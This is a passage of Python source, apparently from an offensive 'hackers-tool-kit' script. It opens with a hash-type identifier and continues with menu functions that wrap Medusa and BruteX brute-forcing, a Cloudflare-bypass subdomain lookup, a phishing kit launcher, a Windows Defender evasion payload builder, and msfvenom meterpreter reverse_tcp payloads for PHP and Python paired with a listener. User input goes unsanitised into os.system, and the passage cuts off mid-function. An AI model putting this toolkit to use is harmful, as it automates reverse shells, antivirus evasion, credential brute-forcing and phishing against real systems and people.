hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if 